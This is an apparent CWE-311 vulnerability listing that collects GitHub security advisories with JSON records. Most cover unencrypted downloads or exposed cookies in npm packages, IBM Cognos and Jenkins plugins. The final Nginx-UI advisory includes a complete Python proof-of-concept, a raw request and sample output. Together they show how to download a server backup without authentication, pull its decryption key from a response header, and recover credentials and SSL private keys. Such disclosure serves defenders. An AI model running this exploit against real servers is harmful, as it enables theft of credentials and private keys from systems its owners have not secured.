CWE-311
DiscouragedMissing Encryption of Sensitive Data
Abstraction: Class · Status: Draft
The product does not encrypt sensitive or critical information before storage or transmission.
779 vulnerabilities reference this CWE, most recent first.
GHSA-G5WR-QM6M-P836
Vulnerability from github – Published: 2022-05-24 16:56 – Updated: 2022-12-09 21:30IBM Cognos Controller 10.3.0, 10.3.1, 10.4.0, and 10.4.1 does not set the secure attribute on authorization tokens or session cookies. This could allow an attacker to obtain sensitive information using man in the middle techniques. IBM X-Force ID: 158876.
{
"affected": [],
"aliases": [
"CVE-2019-4171"
],
"database_specific": {
"cwe_ids": [
"CWE-311"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-09-17T19:15:00Z",
"severity": "MODERATE"
},
"details": "IBM Cognos Controller 10.3.0, 10.3.1, 10.4.0, and 10.4.1 does not set the secure attribute on authorization tokens or session cookies. This could allow an attacker to obtain sensitive information using man in the middle techniques. IBM X-Force ID: 158876.",
"id": "GHSA-g5wr-qm6m-p836",
"modified": "2022-12-09T21:30:52Z",
"published": "2022-05-24T16:56:23Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-4171"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/158876"
},
{
"type": "WEB",
"url": "https://www.ibm.com/support/pages/security-bulletin-security-vulnerabilties-exist-ibm-cognos-controller"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-G785-775G-F2G8
Vulnerability from github – Published: 2019-02-18 23:50 – Updated: 2021-09-16 20:44Affected versions of haxe insecurely download an executable over an unencrypted HTTP connection.
In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running haxe.
Recommendation
Update to version 5.0.10 or later.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "haxe"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "5.0.10"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2016-10602"
],
"database_specific": {
"cwe_ids": [
"CWE-269",
"CWE-311"
],
"github_reviewed": true,
"github_reviewed_at": "2020-06-16T21:36:15Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "Affected versions of `haxe` insecurely download an executable over an unencrypted HTTP connection. \n\nIn scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `haxe`.\n\n\n## Recommendation\n\nUpdate to version 5.0.10 or later.",
"id": "GHSA-g785-775g-f2g8",
"modified": "2021-09-16T20:44:52Z",
"published": "2019-02-18T23:50:21Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2016-10602"
},
{
"type": "PACKAGE",
"url": "https://github.com/HaxeFoundation/npm-haxe"
},
{
"type": "WEB",
"url": "https://www.npmjs.com/advisories/177"
}
],
"schema_version": "1.4.0",
"severity": [],
"summary": "Downloads Resources over HTTP in haxe"
}
GHSA-G7FX-MMJC-R7GV
Vulnerability from github – Published: 2022-01-13 00:00 – Updated: 2022-11-29 21:30Jenkins Conjur Secrets Plugin 1.0.9 and earlier implements functionality that allows attackers able to control agent processes to decrypt secrets stored in Jenkins obtained through another method.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.conjur.jenkins:conjur-credentials"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.0.10"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2022-23116"
],
"database_specific": {
"cwe_ids": [
"CWE-311"
],
"github_reviewed": true,
"github_reviewed_at": "2022-11-29T21:30:23Z",
"nvd_published_at": "2022-01-12T20:15:00Z",
"severity": "MODERATE"
},
"details": "Jenkins Conjur Secrets Plugin 1.0.9 and earlier implements functionality that allows attackers able to control agent processes to decrypt secrets stored in Jenkins obtained through another method.",
"id": "GHSA-g7fx-mmjc-r7gv",
"modified": "2022-11-29T21:30:23Z",
"published": "2022-01-13T00:00:52Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23116"
},
{
"type": "PACKAGE",
"url": "https://github.com/jenkinsci/conjur-credentials-plugin"
},
{
"type": "WEB",
"url": "https://www.jenkins.io/security/advisory/2022-01-12/#SECURITY-2522%20(1)"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2022/01/12/6"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Agent-to-controller security bypass in Jenkins Conjur Secrets Plugin allows decrypting secrets"
}
GHSA-G7W9-VM5M-48Q8
Vulnerability from github – Published: 2019-02-18 23:42 – Updated: 2021-01-08 18:48Affected versions of arcanist insecurely download an executable over an unencrypted HTTP connection.
In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running arcanist.
Recommendation
No patch is currently available for this vulnerability.
The best mitigation is currently to avoid using this package, using a different package if available.
Alternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "arcanist"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "0.0.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2016-10683"
],
"database_specific": {
"cwe_ids": [
"CWE-311"
],
"github_reviewed": true,
"github_reviewed_at": "2020-06-16T21:36:22Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "Affected versions of `arcanist` insecurely download an executable over an unencrypted HTTP connection. \n\nIn scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `arcanist`.\n\n\n## Recommendation\n\nNo patch is currently available for this vulnerability.\n\nThe best mitigation is currently to avoid using this package, using a different package if available. \n\nAlternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.",
"id": "GHSA-g7w9-vm5m-48q8",
"modified": "2021-01-08T18:48:48Z",
"published": "2019-02-18T23:42:09Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2016-10683"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-g7w9-vm5m-48q8"
},
{
"type": "WEB",
"url": "https://www.npmjs.com/advisories/286"
}
],
"schema_version": "1.4.0",
"severity": [],
"summary": "Downloads Resources over HTTP in arcanist"
}
GHSA-G84J-95X2-7G67
Vulnerability from github – Published: 2019-02-18 23:44 – Updated: 2021-01-08 18:48Affected versions of tomita insecurely download an executable over an unencrypted HTTP connection.
In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running tomita.
Recommendation
No patch is currently available for this vulnerability.
The best mitigation is currently to avoid using this package, using a different package if available.
Alternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "tomita"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "0.0.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2016-10662"
],
"database_specific": {
"cwe_ids": [
"CWE-311"
],
"github_reviewed": true,
"github_reviewed_at": "2020-06-16T21:36:25Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "Affected versions of `tomita` insecurely download an executable over an unencrypted HTTP connection. \n\nIn scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `tomita`.\n\n\n## Recommendation\n\nNo patch is currently available for this vulnerability.\n\nThe best mitigation is currently to avoid using this package, using a different package if available. \n\nAlternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.",
"id": "GHSA-g84j-95x2-7g67",
"modified": "2021-01-08T18:48:34Z",
"published": "2019-02-18T23:44:50Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2016-10662"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-g84j-95x2-7g67"
},
{
"type": "WEB",
"url": "https://www.npmjs.com/advisories/267"
}
],
"schema_version": "1.4.0",
"severity": [],
"summary": "Downloads Resources over HTTP in tomita"
}
GHSA-G8C3-6FJ2-87W7
Vulnerability from github – Published: 2023-07-12 18:30 – Updated: 2023-07-20 14:53Jenkins Active Directory Plugin allows testing a new, unsaved configuration by performing a connection test (the button labeled "Test Domain").
Active Directory Plugin 2.30 and earlier ignores the "Require TLS" and "StartTls" options and always performs the connection test to Active directory unencrypted. This allows attackers able to capture network traffic between the Jenkins controller and Active Directory servers to obtain Active Directory credentials.
This only affects the connection test. Connections established during the login process are encrypted if the corresponding TLS option is enabled.
Active Directory Plugin 2.30.1 considers the "Require TLS" and "StartTls" options for connection tests.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.jenkins-ci.plugins:active-directory"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.30.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-37943"
],
"database_specific": {
"cwe_ids": [
"CWE-311"
],
"github_reviewed": true,
"github_reviewed_at": "2023-07-12T19:49:50Z",
"nvd_published_at": "2023-07-12T16:15:13Z",
"severity": "MODERATE"
},
"details": "Jenkins Active Directory Plugin allows testing a new, unsaved configuration by performing a connection test (the button labeled \"Test Domain\").\n\nActive Directory Plugin 2.30 and earlier ignores the \"Require TLS\" and \"StartTls\" options and always performs the connection test to Active directory unencrypted. This allows attackers able to capture network traffic between the Jenkins controller and Active Directory servers to obtain Active Directory credentials.\n\nThis only affects the connection test. Connections established during the login process are encrypted if the corresponding TLS option is enabled.\n\nActive Directory Plugin 2.30.1 considers the \"Require TLS\" and \"StartTls\" options for connection tests.",
"id": "GHSA-g8c3-6fj2-87w7",
"modified": "2023-07-20T14:53:01Z",
"published": "2023-07-12T18:30:38Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37943"
},
{
"type": "WEB",
"url": "https://github.com/jenkinsci/active-directory-plugin/commit/549dde617dbcf533e6cabfe8cc148a250a398211"
},
{
"type": "WEB",
"url": "https://www.jenkins.io/security/advisory/2023-07-12/#SECURITY-3059"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2023/07/12/2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Jenkins Active Directory Plugin vulnerable to Active Directory credential disclosure"
}
GHSA-G93H-75M9-3QQ4
Vulnerability from github – Published: 2019-02-18 23:52 – Updated: 2023-09-09 00:00Affected versions of pngcrush-installer insecurely download an executable over an unencrypted HTTP connection.
In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running pngcrush-installer.
Recommendation
Update to version 1.8.10 or later.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "pngcrush-installer"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.8.10"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2016-10570"
],
"database_specific": {
"cwe_ids": [
"CWE-311"
],
"github_reviewed": true,
"github_reviewed_at": "2020-06-16T21:36:39Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "Affected versions of `pngcrush-installer` insecurely download an executable over an unencrypted HTTP connection. \n\nIn scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `pngcrush-installer`.\n\n\n## Recommendation\n\nUpdate to version 1.8.10 or later.",
"id": "GHSA-g93h-75m9-3qq4",
"modified": "2023-09-09T00:00:42Z",
"published": "2019-02-18T23:52:27Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2016-10570"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-g93h-75m9-3qq4"
},
{
"type": "WEB",
"url": "https://www.npmjs.com/advisories/189"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "pngcrush-installer downloads Resources over HTTP"
}
GHSA-G95J-P8F6-PWH4
Vulnerability from github – Published: 2019-02-18 23:56 – Updated: 2023-09-13 19:39Affected versions of headless-browser-lite insecurely download an executable over an unencrypted HTTP connection.
In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running headless-browser-lite.
Recommendation
Update to version 2015.4.18-a or later.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2015.4.3-10"
},
"package": {
"ecosystem": "npm",
"name": "headless-browser-lite"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2015.4.18-a"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2016-10625"
],
"database_specific": {
"cwe_ids": [
"CWE-311"
],
"github_reviewed": true,
"github_reviewed_at": "2020-06-16T21:36:41Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "Affected versions of `headless-browser-lite` insecurely download an executable over an unencrypted HTTP connection. \n\nIn scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `headless-browser-lite`.\n\n\n## Recommendation\n\nUpdate to version 2015.4.18-a or later.",
"id": "GHSA-g95j-p8f6-pwh4",
"modified": "2023-09-13T19:39:29Z",
"published": "2019-02-18T23:56:58Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2016-10625"
},
{
"type": "WEB",
"url": "https://github.com/kaizhu256/node-phantomjs-lite/commit/96f766e5674e8462b5f5bbd4494390988f0a3916"
},
{
"type": "WEB",
"url": "https://github.com/kaizhu256/node-phantomjs-lite/commit/f6e2a9489446a1dabe175aa8c14a1c55ca824520"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-g95j-p8f6-pwh4"
},
{
"type": "WEB",
"url": "https://www.npmjs.com/advisories/230"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "headless-browser-lite downloads Resources over HTTP"
}
GHSA-G9W5-QFFC-6762
Vulnerability from github – Published: 2026-03-05 18:26 – Updated: 2026-03-05 22:37Summary
The /api/backup endpoint is accessible without authentication and discloses the encryption keys required to decrypt the backup in the X-Backup-Security response header. This allows an unauthenticated attacker to download a full system backup containing sensitive data (user credentials, session tokens, SSL private keys, Nginx configurations) and decrypt it immediately.
Vulnerability Details
| Field | Value |
|---|---|
| CWE | CWE-306: Missing Authentication for Critical Function + CWE-311: Missing Encryption of Sensitive Data |
| Affected File | api/backup/router.go |
| Affected Function | CreateBackup (lines 8-11 in router, implementation in api/backup/backup.go:13-38) |
| Secondary File | internal/backup/backup.go |
| CVSS 3.1 | 9.8 (Critical) |
| CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
Root Cause
The vulnerability exists due to two critical security flaws:
1. Missing Authentication on /api/backup Endpoint
In api/backup/router.go:9, the backup endpoint is registered without any authentication middleware:
func InitRouter(r *gin.RouterGroup) {
r.GET("/backup", CreateBackup) // No authentication required
r.POST("/restore", middleware.EncryptedForm(), RestoreBackup) // Has middleware
}
For comparison, the restore endpoint correctly uses middleware, while the backup endpoint is completely open.
2. Encryption Keys Disclosed in HTTP Response Headers
In api/backup/backup.go:22-33, the AES-256 encryption key and IV are sent in plaintext via the X-Backup-Security header:
func CreateBackup(c *gin.Context) {
result, err := backup.Backup()
if err != nil {
cosy.ErrHandler(c, err)
return
}
// Concatenate Key and IV
securityToken := result.AESKey + ":" + result.AESIv // Keys sent in header
// ...
c.Header("X-Backup-Security", securityToken) // Keys exposed to anyone
// Send file content
http.ServeContent(c.Writer, c.Request, fileName, modTime, reader)
}
The encryption keys are Base64-encoded AES-256 key (32 bytes) and IV (16 bytes), formatted as key:iv.
3. Backup Contents
The backup archive (created in internal/backup/backup.go) contains:
// Files included in backup:
- nginx-ui.zip (encrypted)
└── database.db // User credentials, session tokens
└── app.ini // Configuration with secrets
└── server.key/cert // SSL certificates
- nginx.zip (encrypted)
└── nginx.conf // Nginx configuration
└── sites-enabled/* // Virtual host configs
└── ssl/* // SSL private keys
- hash_info.txt (encrypted)
└── SHA-256 hashes for integrity verification
All files are encrypted with AES-256-CBC, but the keys are disclosed in the response.
Proof of Concept
Python script
#!/usr/bin/env python3
"""
POC: Unauthenticated Backup Download + Key Disclosure via X-Backup-Security
Usage:
python poc.py --target http://127.0.0.1:9000 --out backup.bin --decrypt
"""
import argparse
import base64
import os
import sys
import urllib.parse
import urllib.request
import zipfile
from io import BytesIO
try:
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
except ImportError:
print("Error: pycryptodome required for decryption")
print("Install with: pip install pycryptodome")
sys.exit(1)
def _parse_keys(hdr_val: str):
"""
Parse X-Backup-Security header format: "base64_key:base64_iv"
Example: e5eWtUkqVEIixQjh253kPYe3cpzdasxiYTbOFHm9CJ4=:7XdVSRcgYfWf7C/J0IS8Cg==
"""
v = (hdr_val or "").strip()
# Format is: key:iv (both base64 encoded)
if ":" in v:
parts = v.split(":", 1)
if len(parts) == 2:
return parts[0].strip(), parts[1].strip()
return None, None
def decrypt_aes_cbc(encrypted_data: bytes, key_b64: str, iv_b64: str) -> bytes:
"""Decrypt using AES-256-CBC with PKCS#7 padding"""
key = base64.b64decode(key_b64)
iv = base64.b64decode(iv_b64)
if len(key) != 32:
raise ValueError(f"Invalid key length: {len(key)} (expected 32 bytes for AES-256)")
if len(iv) != 16:
raise ValueError(f"Invalid IV length: {len(iv)} (expected 16 bytes)")
cipher = AES.new(key, AES.MODE_CBC, iv)
decrypted = cipher.decrypt(encrypted_data)
return unpad(decrypted, AES.block_size)
def extract_backup(encrypted_zip_path: str, key_b64: str, iv_b64: str, output_dir: str):
"""Extract and decrypt the backup archive"""
print(f"\n[*] Extracting encrypted backup to {output_dir}")
os.makedirs(output_dir, exist_ok=True)
# Extract the main ZIP (contains encrypted files)
with zipfile.ZipFile(encrypted_zip_path, 'r') as main_zip:
print(f"[*] Main archive contains: {main_zip.namelist()}")
main_zip.extractall(output_dir)
# Decrypt each file
encrypted_files = ["hash_info.txt", "nginx-ui.zip", "nginx.zip"]
for filename in encrypted_files:
filepath = os.path.join(output_dir, filename)
if not os.path.exists(filepath):
print(f"[!] Warning: {filename} not found")
continue
print(f"[*] Decrypting {filename}...")
with open(filepath, "rb") as f:
encrypted = f.read()
try:
decrypted = decrypt_aes_cbc(encrypted, key_b64, iv_b64)
# Write decrypted file
decrypted_path = filepath.replace(".zip", "_decrypted.zip") if filename.endswith(".zip") else filepath + ".decrypted"
with open(decrypted_path, "wb") as f:
f.write(decrypted)
print(f" → Saved to {decrypted_path} ({len(decrypted)} bytes)")
# If it's a ZIP, extract it
if filename.endswith(".zip"):
extract_dir = os.path.join(output_dir, filename.replace(".zip", ""))
os.makedirs(extract_dir, exist_ok=True)
with zipfile.ZipFile(BytesIO(decrypted), 'r') as inner_zip:
inner_zip.extractall(extract_dir)
print(f" → Extracted {len(inner_zip.namelist())} files to {extract_dir}")
except Exception as e:
print(f" ✗ Failed to decrypt {filename}: {e}")
# Show hash info
hash_info_path = os.path.join(output_dir, "hash_info.txt.decrypted")
if os.path.exists(hash_info_path):
print(f"\n[*] Hash info:")
with open(hash_info_path, "r") as f:
print(f.read())
def main():
ap = argparse.ArgumentParser(
description="Nginx UI - Unauthenticated backup download with key disclosure"
)
ap.add_argument("--target", required=True, help="Base URL, e.g. http://host:port")
ap.add_argument("--out", default="backup.bin", help="Where to save the encrypted backup")
ap.add_argument("--decrypt", action="store_true", help="Decrypt the backup after download")
ap.add_argument("--extract-dir", default="backup_extracted", help="Directory to extract decrypted files")
args = ap.parse_args()
url = urllib.parse.urljoin(args.target.rstrip("/") + "/", "api/backup")
# Unauthenticated request to the backup endpoint
req = urllib.request.Request(url, method="GET")
try:
with urllib.request.urlopen(req, timeout=20) as resp:
hdr = resp.headers.get("X-Backup-Security", "")
key, iv = _parse_keys(hdr)
data = resp.read()
except urllib.error.HTTPError as e:
print(f"[!] HTTP Error {e.code}: {e.reason}")
sys.exit(1)
except Exception as e:
print(f"[!] Error: {e}")
sys.exit(1)
with open(args.out, "wb") as f:
f.write(data)
# Key/IV disclosure in response header enables decryption of the downloaded backup
print(f"\nX-Backup-Security: {hdr}")
print(f"Parsed AES-256 key: {key}")
print(f"Parsed AES IV : {iv}")
if key and iv:
# Verify key/IV lengths
try:
key_bytes = base64.b64decode(key)
iv_bytes = base64.b64decode(iv)
print(f"\n[*] Key length: {len(key_bytes)} bytes (AES-256 ✓)")
print(f"[*] IV length : {len(iv_bytes)} bytes (AES block size ✓)")
except Exception as e:
print(f"[!] Error decoding keys: {e}")
sys.exit(1)
if args.decrypt:
try:
extract_backup(args.out, key, iv, args.extract_dir)
except Exception as e:
print(f"\n[!] Decryption failed: {e}")
import traceback
traceback.print_exc()
sys.exit(1)
else:
print("\n[!] Failed to parse encryption keys from X-Backup-Security header")
print(f" Header value: {hdr}")
if __name__ == "__main__":
main()
# Download and decrypt backup (no authentication required)
# pip install pycryptodome
python poc.py --target http://victim:9000 --decrypt
X-Backup-Security: gnfd8BhrjzrxS7yLRoVvK+fyV9tjS50cfUn/RWuYjGA=:+rLZrXK3kbWFRK3qMpB3jw==
Parsed AES-256 key: gnfd8BhrjzrxS7yLRoVvK+fyV9tjS50cfUn/RWuYjGA=
Parsed AES IV : +rLZrXK3kbWFRK3qMpB3jw==
[*] Key length: 32 bytes (AES-256 ✓)
[*] IV length : 16 bytes (AES block size ✓)
[*] Extracting encrypted backup to backup_extracted
[*] Main archive contains: ['hash_info.txt', 'nginx-ui.zip', 'nginx.zip']
[*] Decrypting hash_info.txt...
→ Saved to backup_extracted/hash_info.txt.decrypted (199 bytes)
[*] Decrypting nginx-ui.zip...
→ Saved to backup_extracted/nginx-ui_decrypted.zip (12510 bytes)
→ Extracted 2 files to backup_extracted/nginx-ui
[*] Decrypting nginx.zip...
→ Saved to backup_extracted/nginx_decrypted.zip (5682 bytes)
→ Extracted 17 files to backup_extracted/nginx
[*] Hash info:
nginx-ui_hash: 7c803b9b8791cebfad36977a321431182b22878c3faf8af544d05318ccb83ad5
nginx_hash: 183458949e54794e1295449f0d6c1175bb92c1ee008be671ee9ee759aad73905
timestamp: 20260129-122110
version: 2.3.2
HTTP Request (Raw)
GET /api/backup HTTP/1.1
Host: victim:9000
No authentication required - this request will succeed and return:
- Encrypted backup as ZIP file
- Encryption keys in X-Backup-Security header
Example Response
HTTP/1.1 200 OK
Content-Type: application/zip
Content-Disposition: attachment; filename=backup-20260129-120000.zip
X-Backup-Security: e5eWtUkqVEIixQjh253kPYe3cpzdasxiYTbOFHm9CJ4=:7XdVSRcgYfWf7C/J0IS8Cg==
[Binary ZIP data]
The X-Backup-Security header contains:
- Key: e5eWtUkqVEIixQjh253kPYe3cpzdasxiYTbOFHm9CJ4= (Base64-encoded 32-byte AES-256 key)
- IV: 7XdVSRcgYfWf7C/J0IS8Cg== (Base64-encoded 16-byte IV)
Resources
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/0xJacky/Nginx-UI"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.3.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-27944"
],
"database_specific": {
"cwe_ids": [
"CWE-306",
"CWE-311"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-05T18:26:41Z",
"nvd_published_at": "2026-03-05T19:16:05Z",
"severity": "CRITICAL"
},
"details": "## Summary\n\nThe `/api/backup` endpoint is accessible without authentication and discloses the encryption keys required to decrypt the backup in the `X-Backup-Security` response header. This allows an unauthenticated attacker to download a full system backup containing sensitive data (user credentials, session tokens, SSL private keys, Nginx configurations) and decrypt it immediately.\n\n## Vulnerability Details\n\n| Field | Value |\n|-------|-------|\n| CWE | CWE-306: Missing Authentication for Critical Function + CWE-311: Missing Encryption of Sensitive Data |\n| Affected File | `api/backup/router.go` |\n| Affected Function | `CreateBackup` (lines 8-11 in router, implementation in `api/backup/backup.go:13-38`) |\n| Secondary File | `internal/backup/backup.go` |\n| CVSS 3.1 | 9.8 (Critical) |\n| CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |\n\n## Root Cause\n\nThe vulnerability exists due to two critical security flaws:\n\n### 1. Missing Authentication on /api/backup Endpoint\n\nIn `api/backup/router.go:9`, the backup endpoint is registered without any authentication middleware:\n\n```go\nfunc InitRouter(r *gin.RouterGroup) {\n\tr.GET(\"/backup\", CreateBackup) // No authentication required\n\tr.POST(\"/restore\", middleware.EncryptedForm(), RestoreBackup) // Has middleware\n}\n```\n\nFor comparison, the restore endpoint correctly uses middleware, while the backup endpoint is completely open.\n\n### 2. Encryption Keys Disclosed in HTTP Response Headers\n\nIn `api/backup/backup.go:22-33`, the AES-256 encryption key and IV are sent in plaintext via the `X-Backup-Security` header:\n\n```go\nfunc CreateBackup(c *gin.Context) {\n\tresult, err := backup.Backup()\n\tif err != nil {\n\t\tcosy.ErrHandler(c, err)\n\t\treturn\n\t}\n\n\t// Concatenate Key and IV\n\tsecurityToken := result.AESKey + \":\" + result.AESIv // Keys sent in header\n\n\t// ...\n\tc.Header(\"X-Backup-Security\", securityToken) // Keys exposed to anyone\n\n\t// Send file content\n\thttp.ServeContent(c.Writer, c.Request, fileName, modTime, reader)\n}\n```\n\nThe encryption keys are Base64-encoded AES-256 key (32 bytes) and IV (16 bytes), formatted as `key:iv`.\n\n### 3. Backup Contents\n\nThe backup archive (created in `internal/backup/backup.go`) contains:\n\n```go\n// Files included in backup:\n- nginx-ui.zip (encrypted)\n \u2514\u2500\u2500 database.db // User credentials, session tokens\n \u2514\u2500\u2500 app.ini // Configuration with secrets\n \u2514\u2500\u2500 server.key/cert // SSL certificates\n\n- nginx.zip (encrypted)\n \u2514\u2500\u2500 nginx.conf // Nginx configuration\n \u2514\u2500\u2500 sites-enabled/* // Virtual host configs\n \u2514\u2500\u2500 ssl/* // SSL private keys\n\n- hash_info.txt (encrypted)\n \u2514\u2500\u2500 SHA-256 hashes for integrity verification\n```\n\nAll files are encrypted with AES-256-CBC, but the keys are disclosed in the response.\n\n## Proof of Concept\n\n### Python script\n\n```python\n#!/usr/bin/env python3\n\n\"\"\"\nPOC: Unauthenticated Backup Download + Key Disclosure via X-Backup-Security\n\nUsage:\n python poc.py --target http://127.0.0.1:9000 --out backup.bin --decrypt\n\"\"\"\n\nimport argparse\nimport base64\nimport os\nimport sys\nimport urllib.parse\nimport urllib.request\nimport zipfile\nfrom io import BytesIO\n\ntry:\n from Crypto.Cipher import AES\n from Crypto.Util.Padding import unpad\nexcept ImportError:\n print(\"Error: pycryptodome required for decryption\")\n print(\"Install with: pip install pycryptodome\")\n sys.exit(1)\n\n\ndef _parse_keys(hdr_val: str):\n \"\"\"\n Parse X-Backup-Security header format: \"base64_key:base64_iv\"\n Example: e5eWtUkqVEIixQjh253kPYe3cpzdasxiYTbOFHm9CJ4=:7XdVSRcgYfWf7C/J0IS8Cg==\n \"\"\"\n v = (hdr_val or \"\").strip()\n\n # Format is: key:iv (both base64 encoded)\n if \":\" in v:\n parts = v.split(\":\", 1)\n if len(parts) == 2:\n return parts[0].strip(), parts[1].strip()\n\n return None, None\n\n\ndef decrypt_aes_cbc(encrypted_data: bytes, key_b64: str, iv_b64: str) -\u003e bytes:\n \"\"\"Decrypt using AES-256-CBC with PKCS#7 padding\"\"\"\n key = base64.b64decode(key_b64)\n iv = base64.b64decode(iv_b64)\n\n if len(key) != 32:\n raise ValueError(f\"Invalid key length: {len(key)} (expected 32 bytes for AES-256)\")\n if len(iv) != 16:\n raise ValueError(f\"Invalid IV length: {len(iv)} (expected 16 bytes)\")\n\n cipher = AES.new(key, AES.MODE_CBC, iv)\n decrypted = cipher.decrypt(encrypted_data)\n return unpad(decrypted, AES.block_size)\n\n\ndef extract_backup(encrypted_zip_path: str, key_b64: str, iv_b64: str, output_dir: str):\n \"\"\"Extract and decrypt the backup archive\"\"\"\n print(f\"\\n[*] Extracting encrypted backup to {output_dir}\")\n\n os.makedirs(output_dir, exist_ok=True)\n\n # Extract the main ZIP (contains encrypted files)\n with zipfile.ZipFile(encrypted_zip_path, \u0027r\u0027) as main_zip:\n print(f\"[*] Main archive contains: {main_zip.namelist()}\")\n main_zip.extractall(output_dir)\n\n # Decrypt each file\n encrypted_files = [\"hash_info.txt\", \"nginx-ui.zip\", \"nginx.zip\"]\n\n for filename in 